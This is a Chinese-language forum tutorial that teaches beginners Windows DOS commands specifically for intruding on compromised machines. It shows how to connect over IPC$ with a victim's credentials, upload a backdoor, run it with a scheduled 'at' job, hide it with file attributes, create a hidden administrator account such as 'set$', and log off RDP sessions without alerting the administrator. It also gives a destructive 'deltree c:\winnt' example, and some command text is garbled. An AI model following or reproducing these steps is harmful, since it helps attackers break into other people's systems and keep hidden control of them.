返回列表 发帖

菜鸟入门版-DOS命令

序言

大家在入侵时,一定会用到DOS命令的,它的功能非常的强大.今天我就对常用的DOS命令作个详细的解说.主要是给刚入门者和接触DOS命令少的朋友看的.下面我挑几个比较常用的给大家说说.
以windows2000为例,windows xp类同.

DIR
显示当前盘下的所有文件夹和文件.
比较常用的方法是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :

  DIR c:\winnt\system32\systems.exe

则会显示:
         2004-05-24  20:06           194,762 systems.exe
              1 个文件        194,762 字节
              0 个目录  4,658,597,888 可用字节

如果你没有上传成功,则显示如下:
                                 驱动器 C 中的卷没有标签。
                                卷的序列号是 6458-3DB8
                                 c:\winnt\system32\的目录
                                  找不到文件

CD
改变当前目录
具体看一下下面的命令:
                       C:\>cd winnt             file://进/入winnt文件夹

                       C:\winnt>cd system32      file://进/入system32 文件夹

                        C:\winnt\system32>cd..    file://回/到上一级目录

                        C:\winnt>cd..

                         C:\>
                        C:\>d:                file://进/入D盘

                       D:\>e:                  file://进/入E盘

                         E:\>

del和deltree
DEL:删除文件.
看下面的命令:
              C:\>del c:\xx\ww.txt  file://删/除C盘的XX目录下的名叫WW的文件.

              C:\>
              C:\>del c:\xx\*.*     file://删/除C盘的XX目录下所有文件

deltree
这个更具有破坏性,不但能删除所有文件,连文件夹也删除
           
                    C:\>deltree c:\winnt file://删/除C盘下的winnt所有文件和文件夹.
这个大家要小心使用.


attrid
显示和更改文件或文件夹属性.
文件或文件夹的属性有 隐藏,用字母H表示.   只读,用R表示.   存档,用A表示.  系统,用S表示
改变一个文件或文件夹属性,  " + " 表示增加,  "  -  ",表示去掉某个属性.
平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe
命令如下:
           C:\>attrid +h   c:\winnt\system32\systems.exe   file://这/样在system32下就找不到systems.exe

           C:\>attrid -h   c:\winnt\system32\systems.exe  file://去/掉systems.exe的隐藏属性

copy
复制一个或多个文件到其它目录
比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,
              
                       C:\>copy c:\1.txt  d:\vv\1.exe

比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了共享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:
                  
                  C:\>copy c:\systems.exe    file://肉/鸡IP\d$


type
显示文件内容
我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP
命令如下:

          C:\>type c:\xx\hack.txt
序号    开始IP地址      结束IP地址      国家/省/直辖市  城市/区县/组织
58      024.179.140.000 024.179.150.255 中国台湾省
80      061.013.000.000 061.013.255.255 中国台湾省
86      061.058.065.000 061.058.070.255 中国台湾省
87      061.059.160.000 061.059.255.255 中国台湾省
89      061.070.100.000 061.070.150.255 中国台湾省
1788    061.217.179.000 061.217.179.255 中国台湾省      台南市
1789    061.216.000.000 061.219.255.255 中国台湾省
1790    061.220.080.000 061.220.150.255 中国台湾省      台北市
1791    061.224.000.000 061.224.255.255 中国台湾省      台北市
1792    061.225.000.000 061.225.255.255 中国台湾省
3390    134.208.000.000 134.208.255.255 中国台湾省
3584    139.175.000.000 139.175.255.255 中国台湾省
3590    140.092.000.000 140.092.255.255 中国台湾省
3593    140.096.000.000 140.096.255.255 中国台湾省
3596    140.112.000.000 140.112.255.255 中国台湾省      台湾大学
C:\>

它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:

                   C:\>type c:\boot.ini

                    [boot loader]
                    timeout=30
                    default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
                   [operating systems]
                    multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
                   /fastdetect

看出来没有?,我用的是XP系统.

这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.

ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
                              ping   ip
                              ping   网址

下面P的是本站:

C:\>ping http://www.hf110.com/

Pinging http://www.hf110.com/ [218.89.0.231] with 32 bytes of data:

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Ping statistics for 218.89.0.231:
   ackets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
   Minimum = 66ms, Maximum = 67ms, Average = 66ms

上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.


net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接

net use \\肉鸡ip\ipc$ "密码"  /user:"用户名"

连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).

copy D:\systems.exe  \\肉鸡ip\c$   //这里它要开放共享,你才能上传.否则无法上传成功.

net time \\肉鸡ip   //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10

at  \\肉鸡ip  15:12  systems.exe   //在15:12分,运行systems.exe

在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.


net user
查看用户或新建一个用户.
这是在我电脑上的截图


C:\>net user

file://BILLGATES/ 的用户帐户

---------------------------------------------------------------------
Guest                    guest1                   HelpAssistant
SUPPORT_388945a0         yhkj
命令成功完成。


C:\>


上面是我所有的用户.
现在我新建一个setwell的用户,密码是123456,  截图如下

C:\>net user setwell 123456 /add
命令成功完成。

C:\>net localgroup administrators setwell /add       //这条命令是加setwell为管理员
命令成功完成。                        


接下来我们再net user ,载图如下

C:\>net user

file://BILLGATES/ 的用户帐户

----------------------------------------------------------------
Guest                    guest1                   HelpAssistant
setwell                  SUPPORT_388945a0         yhkj
命令成功完成。


建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:

C:\>net user set$ 123456 /add
命令成功完成。

C:\>net localgroup administrators set$ /add
命令成功完成。                        

C:\>net user

file://BILLGATES/ 的用户帐户

-----------------------------------------------------------------
Guest                    guest1                   HelpAssistant
setwell                  SUPPORT_388945a0         yhkj
命令成功完成。


C:\>

看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:


C:\>net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。


C:\>


看到没有,我们看到set$这个用户了.

如果要删除用户用这个命令:

C:\>net user setwell /delete


net start
1.启动某些服务
比如:                net start telnet   //启动telnet服务

2.查看当前启动了什么服务.看看我的电脑启动了什么服务:

C:\>net start
已经启动以下 Windows 服务:

Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger
菜鸟入门版-DOS命令之三

这只是一部分服务.


net stop
停止某些服务.站长今天也说到了.我不多了.

net share
查看默认共享.也就是查看这些共享C$ D$ e$ f$ admin$ ipc$,这是系统默认的.我的全部关了,我
到肉鸡上截张图吧.

C:\Documents and Settings\Administrator>net share
D$           D:\                             默认共享                          
F$           F:\                             默认共享                          
ADMIN$       C:\WINNT                        远程管理                          
C$           C:\                             默认共享                          
E$           E:\                             默认共享                          
命令成功完成。


C:\Documents and Settings\Administrator>

这个肉鸡的IPC$共享竟然关了.


net view
也是查看共享,但不是上面的默认共享了,还是来张截图吧.也是肉鸡的,

C:\Documents and Settings\Administrator>net view
服务器名称            注释

-------------------------------------------------------------------------------
file://17/                                                                           
file://HMZ/                                                                          
file://ZGH/                                                                          
命令成功完成。


C:\Documents and Settings\Administrator>


学DOS命令看起来有点烦,其实是挺容易学的.而且学好了,在入侵中,会起到举足轻重的作用.下次讲netstat 等命令.


netstat -an
使用这个命令可以察看到和本机的所有的连接.看一下在我电脑上的截图,

D:\>netstat -an

Active Connections

Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
TCP    180.254.158.42:139     0.0.0.0:0              LISTENING
TCP    218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
UDP    0.0.0.0:500            *:*
UDP    0.0.0.0:1035           *:*
UDP    0.0.0.0:1037           *:*
UDP    0.0.0.0:1134           *:*
UDP    0.0.0.0:1136           *:*



Proto  Local Address          Foreign Address        State
协议   本地端口及IP地址       远程端口及IP地址      状态

LISTENING  监听状态  表示等待对方连接

ESTABLISHED  正在连接着.

TCP  协议是TCP

UDP  协议是UDP

TCP        218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
这个表示  利用tcp协议 本机ip(218.95.49.187通过端口:2935 和远程ip(218.89.0.231)端口:80连接


query
这个命令只有在开了3389端口(也不一定端口是3389,说不定改成别的端口了.严格讲应是开了远程终端服务)的机子,才能用上.我用1$的用户名上了一台3389机子,看一下截图:

c:\>query user
USERNAME         SESSIONNAME       ID   STATE
administrator     console           0    运行中
1$                rdp-tcp#2         1    运行中


看到上面没有,管理员也在,如果你要退出的话,就用如下命令:

logoff ID  这儿是logoff 1.

这是正常退出的.说到退出,还有一个办法,就是在开始---关机---注销1$.如果你用另外的方法退出的话,那么肉鸡在关机时,会出现类如"有一个其它客人登录到这台服务器,如果你退出,对方的会话数据会丢失"一类的话.这样管理员就会发现了.


ASP.NET

返回列表